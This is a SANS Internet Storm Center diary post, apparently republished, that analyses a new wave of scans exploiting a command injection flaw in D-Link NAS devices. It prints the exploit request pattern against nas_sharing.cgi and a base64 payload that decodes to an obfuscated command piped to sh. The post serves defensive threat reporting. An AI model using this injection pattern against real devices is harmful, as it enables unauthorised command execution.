New Exploit Variation Against D-Link NAS Devices (CVE-2024-3273), (Tue, Jul 23rd)

This post was originally published on this site

In April, an OS command injection vulnerability in various D-Link NAS devices was made public [1]. The vulnerability, %%CVE:2024-3273%% was exploited soon after it became public. Many of the affected devices are no longer supported.

We have seen different exploits following similar patterns:

/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=[base 64 encoded payload]

After the initial scans, we had two more "spikes" in scans for this vulnerability. The second one just started two days ago.

graph of DLink exploit scans between April and today

The latest set of scans uses this payload:

ZWNobwktZQlcXHg2NVxceDYzXFx4NjhcXHg2ZlxceDIwXFx4MjdcXHg3OFxceDc4XFx4NzhcXHg3OFxceDc4XFx4NjNcXHg2M1xceDYzXFx4NjNcXHg2M1xceDI3fHNo

This payload decodes to

echo    -e    x65x63x68x6fx20x27x78x78x78x78x78x63x63x63x63x63x27|sh

Encoding strings as hexadecimal with "echo -e" has been popular for a while and took off after Mirai started using it. In this case, the command to be executed is:

echo 'xxxxxccccc'|sh

The goal of this exploit is to find vulnerable machines. The "double obfuscation" is likely supposed to bypass some filters and better discriminate against honeypots. I have seen "non functional" exploits used to detect honeypots by attempting to fingerprint the error message returned. Maybe a pattern to add to our honeypots after lunch.

The single source (%%ip:192.227.190.158%%) scanning for this particular version of the exploit on July 19th has now switched to related scans for nas_sharing.cgi

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-3273


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.